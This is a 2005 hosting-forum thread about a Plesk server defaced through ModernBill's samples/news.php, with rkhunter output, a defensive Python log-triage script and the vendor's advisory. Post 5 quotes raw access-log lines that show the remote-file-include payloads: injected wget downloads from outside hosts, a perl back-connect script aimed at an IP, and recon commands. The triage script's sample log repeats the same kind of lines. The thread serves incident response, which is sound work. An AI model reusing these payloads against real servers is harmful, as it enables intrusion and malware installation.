
Hacked by Infection Group

Discussion in 'Plesk for Linux - 8.x and Older' started by ryanz, Apr 17, 2005.

  1. ryanz

    ryanz Basic Pleskian

    24
    73%
    Joined:
    Nov 23, 2002
    Messages:
    91
    Likes Received:
    0
    Hacked by Infection Group (Check your Modernbill Version)

    Hi,

    One of our servers was hacked by "Infection Group" and all index files were replaced by modified index.html files.

    So far I only found two executable files called l_all.exe and ram.exe in /tmp

    Does anyone have experience with this or know how they did it and what to check for?

    Any help would be appreciated.
     
  2. pdreissen

    pdreissen Guest

    0
     
  3. ryanz

    ryanz Basic Pleskian

    Thanks pdreissen,

    We have chkrootkit installed and it came up clean. I've now installed rkhunter and get the following warnings on a RH9 (Fully updated) Plesk 7.5.X:

    Application advisories
    * Application scan
    Checking Apache2 modules ... [ Not found ]
    Checking Apache configuration ... [ OK ]

    * Application version scan
    - GnuPG 1.2.1 [ Old or patched version ]
    - Apache 2.0.40 [ Old or patched version ]
    - Bind DNS [unknown] [ OK ]
    - OpenSSL 0.9.7a [ Old or patched version ]
    PHP Warning: Function registration failed - duplicate name - sg_load in Unknown on line 0
    PHP Warning: SourceGuardian: Unable to register functions, unable to load in Unknown on line 0
    - PHP 4.3.10 [ OK ]
    - Procmail MTA 3.22 [ OK ]
    - ProFTPd 1.2.10 [ OK ]
    - OpenSSH 3.9.0p1 [ OK ]

    ---------------------------- Scan results ----------------------------

    MD5
    MD5 compared: 51
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 342
    Possible infected files: 0

    Application scan
    Vulnerable applications: 3

    Scanning took 126 seconds

    -----------------------------------------------------------------------

    It seems all index.php, index.html, index.jsp, etc were replaced by an index file in /tmp

    Still looking through the logs...
     
  4. pdreissen

    pdreissen Guest

    0
     
    Seems that some of your apps are old and possibly "unsafe" versions.
    Please get those updated.

    Also check /var/spool/cron maybe there is an Apache cron entry...

    Remove it if you don't need what's inside it.

    Please read this thread for some good advice on how to secure your server:

    http://forum.plesk.com/showthread.php?s=&threadid=19876
     
  5. ryanz

    ryanz Basic Pleskian

    Look at these extracts from a domain logfile:

    "GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://doptik.i8.com/Bd/bd_daemon.jpg HTTP/1.1" 200 2575 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20geocities.com/deiz0r/dc.pl HTTP/1.1" 200 2556 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;perl%20dc.pl%20201.0.218.111%2021 HTTP/1.1" 200 2287 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=locate%20httpd.conf HTTP/1.1" 200 2585 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.conf%20|%20grep%20ServerName HTTP/1.1" 200 2350 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/;ls HTTP/1.1" 200 2247 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/CVS;ls HTTP/1.1" 200 2247 "
    T /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/;ls HTTP/1.1" 200 2247 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20ServerName HTTP/1.1" 200 3164 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20DocumentRoot HTTP/1.1" 200 3349 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/default;ls HTTP/1.1" 200 2205 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/;ls HTTP/1.1" 200 4350 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts;ls HTTP/1.1" 200 4350 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;ls HTTP/1.1" 200 3502 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 2556 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 3327 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/ram.exe HTTP/1.1" 200 3322 "
    GET /ram.exe HTTP/1.1" 403 562 "
    GET /l_all.exe HTTP/1.1" 200 497152 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
    GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
    GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
    GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs/modernbill/;cat%20ram.exe HTTP/1.1" 200 2212 "
    GET /l_all.exe HTTP/1.1" 200 497152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0

    Maybe this has some clues and can help some of the other users. The IP addresses were 200.232.233.235 and 201.0.218.111
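    The extracts above show the classic two-stage pattern: a remote file include through the samples script's DIR parameter, then a second parameter carrying shell commands (download to /tmp, run an interpreter, recon with uname/id, finally fetch the dropped file back out of the docroot). As an added example, not code from this thread or from Plesk or ModernBill, here is a small Python triage script that walks Apache combined-format access-log lines and flags those three indicators so the source IPs, the abused script and the payload URLs can be pulled out in one pass. The log lines, IPs and host names in it are constructed placeholders rather than the ones quoted in the post, and the parameter name cmd and the command-word list are my assumptions about what to look for.

```python
"""Triage Apache access-log lines for remote-file-include (RFI) and
command-injection indicators.

Added example, not code from the forum thread.  SAMPLE_LOG is constructed:
the IPs and host names are documentation placeholders, not the ones in the
post.  The set of command words is a heuristic I chose, not an exhaustive list.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format, up to and including the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter whose value starts with a URL scheme is an RFI candidate.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Shell words seen in the thread (downloaders, interpreters, recon, cd).
SHELL_HINT_RE = re.compile(
    r'(^|[;|&\s])(wget|curl|perl|python|sh|bash|nc|id|uname|cat|ls|cd)(?=\s|;|$)'
)
DOWNLOAD_URL_RE = re.compile(r'(?:wget|curl)\s+(\S+)')
# Executables fetched straight out of the docroot after being dropped there.
ARTIFACT_RE = re.compile(r'\.(exe|pl|sh)$', re.IGNORECASE)

SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2005:03:12:01 +0200] "GET /modernbill/samples/news.php?DIR=http://attacker.example/newcmd.gif?&cmd=cd%20/tmp;wget%20http://attacker.example/Bd/bd_daemon.jpg HTTP/1.1" 200 2575 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Apr/2005:03:12:09 +0200] "GET /modernbill/samples/news.php?DIR=http://attacker.example/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "-" "Mozilla/4.0"
198.51.100.7 - - [17/Apr/2005:03:15:44 +0200] "GET /l_all.exe HTTP/1.1" 200 497152 "-" "Mozilla/5.0"
192.0.2.10 - - [17/Apr/2005:03:16:00 +0200] "GET /index.php?page=about HTTP/1.1" 200 1406 "-" "Mozilla/5.0"
"""


def parse_query(query):
    """Split a query string on '&' only, so ';' inside a value survives
    (a ';' is exactly the command separator we want to see)."""
    params = []
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params.append((unquote_plus(name), unquote_plus(value)))
    return params


def triage_line(line):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlsplit(m.group('target'))
    params = parse_query(parsed.query)
    rfi = [(k, v) for k, v in params if REMOTE_SCHEME_RE.match(v)]
    cmds = [(k, v) for k, v in params if SHELL_HINT_RE.search(v)]
    payload_urls = [u for _, v in cmds for u in DOWNLOAD_URL_RE.findall(v)]
    status = int(m.group('status'))
    kinds = []
    if rfi:
        kinds.append('rfi')
    if cmds:
        kinds.append('cmd_injection')
    if ARTIFACT_RE.search(parsed.path) and status == 200:
        kinds.append('artifact_served')   # dropped file actually downloadable
    if not kinds:
        return None
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'path': parsed.path,
            'status': status, 'kinds': kinds, 'rfi_params': rfi,
            'cmd_params': cmds, 'payload_urls': payload_urls}


def triage_log(text):
    """Summarise all findings in a log: who, which script, which payloads."""
    findings = [f for f in map(triage_line, text.splitlines()) if f]
    injected = [f for f in findings if 'rfi' in f['kinds'] or 'cmd_injection' in f['kinds']]
    return {
        'source_ips': sorted({f['ip'] for f in findings}),
        'abused_scripts': sorted({f['path'] for f in injected}),
        'payload_urls': sorted({u for f in findings for u in f['payload_urls']}),
        'findings': findings,
    }


if __name__ == '__main__':
    summary = triage_log(SAMPLE_LOG)
    for key in ('source_ips', 'abused_scripts', 'payload_urls'):
        print(f'{key}: {summary[key]}')
    for f in summary['findings']:
        print(f"{f['ts']} {f['ip']} {f['path']} {f['status']} {','.join(f['kinds'])}")
```

    Run it against a real access_log with `triage_log(open('/var/log/httpd/access_log').read())`; the abused_scripts list tells you which file to remove (here the samples directory the vendor notice says should not be live), payload_urls tells you what to look for in /tmp and the docroots, and source_ips feeds the firewall. The heuristic will flag a legitimate value such as "cat pictures", so treat a hit as something to read, not something to block automatically.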
     
  6. ryanz

    ryanz Basic Pleskian

    Look at this

    From Modernbill Support

    Version 4.3.1 Release - Security Update

    In keeping with our quarterly release policy, ModernGigabyte is proud to release our new version 4.3.1. Please note that this version release contains some important security upgrades. You will want to upgrade to this version as soon as practicable. Changes in PHP scripting methods make it necessary for us to make changes from time to time to reduce the possibility of cross-scripting and SQL injection attacks.

    If you are unable to upgrade, please ensure you have removed the "samples" directory from your ModernBill installation. The "samples" files are not intended for live usage and should only be used as an example of how to integrate some aspects of ModernBill into your existing web site.

    This will protect your ModernBill from the "Remote File Include Vulnerability" until you can upgrade to the latest release.
     